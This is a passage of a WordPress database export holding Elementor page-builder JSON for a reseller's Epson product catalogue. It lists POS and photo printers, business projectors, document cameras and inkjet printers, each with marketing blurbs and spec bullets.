]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-536Wi\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson 595Wi\\/585Wi\\/575Wi<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L1405UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-G7400UNL\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-Z10000U\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7853,3465,'_elementor_version','2.5.14'),(7905,3473,'_wp_page_template','template-fullwidth.php'),(7856,3466,'_wp_page_template','template-fullwidth.php'),(7857,3466,'_elementor_edit_mode','builder'),(7858,3466,'_elementor_template_type','post'),(7859,3466,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, 